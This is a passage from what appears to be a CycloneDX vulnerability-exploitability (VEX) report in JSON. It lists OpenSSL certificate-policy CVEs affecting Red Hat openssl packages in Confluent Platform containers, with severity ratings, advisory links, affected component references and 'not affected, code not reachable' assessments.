          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-0465",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Applications that use a non-default option when verifying certificates may be\nvulnerable to an attack from a malicious CA to circumvent certain checks.\n\nInvalid certificate policies in leaf certificates are silently ignored by\nOpenSSL and other certificate policy checks are skipped for that certificate.\nA malicious CA could use this to deliberately assert invalid certificate policies\nin order to circumvent policy checking on the certificate altogether.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-0465"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:3722"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-0465"
        },
        {
          "url": "https://bugzilla.redhat.com/2181082"
        },
        {
          "url": "https://bugzilla.redhat.com/2182561"
        },
        {
          "url": "https://bugzilla.redhat.com/2182565"
        },
        {
          "url": "https://bugzilla.redhat.com/2188461"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-3722.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c"
        },
        {
          "url": "https://github.com/advisories/GHSA-77f3-6546-6rj7"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-0465.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-3722.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6039-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230328.txt"
        }
      ],
      "published": "2023-03-28T15:15:06+00:00",
      "updated": "2026-06-17T05:25:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-0466",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to\nimplicitly enable the certificate policy check when doing certificate\nverification. However the implementation of the function does not\nenable the check which allows certificates with invalid or incorrect\npolicies to pass the certificate verification.\n\nAs suddenly enabling the policy check could break existing deployments it was\ndecided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy()\nfunction.\n\nInstead the applications that require OpenSSL to perform certificate\npolicy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly\nenable the policy check by calling X509_VERIFY_PARAM_set_flags() with\nthe X509_V_FLAG_POLICY_CHECK flag argument.\n\nCertificate policy checks are disabled by default in OpenSSL and are not\ncommonly used by applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-0466"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/09/28/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:3722"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-0466"
        },
        {
          "url": "https://bugzilla.redhat.com/2181082"
        },
        {
          "url": "https://bugzilla.redhat.com/2182561"
        },
        {
          "url": "https://bugzilla.redhat.com/2182565"
        },
        {
          "url": "https://bugzilla.redhat.com/2188461"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-3722.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061"
        },
        {
          "url": "https://github.com/advisories/GHSA-pxvj-4wx4-gv6w"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-0466.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-3722.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6039-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230328.txt"
        }
      ],
      "published": "2023-03-28T15:15:06+00:00",
      "updated": "2026-06-17T05:25:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
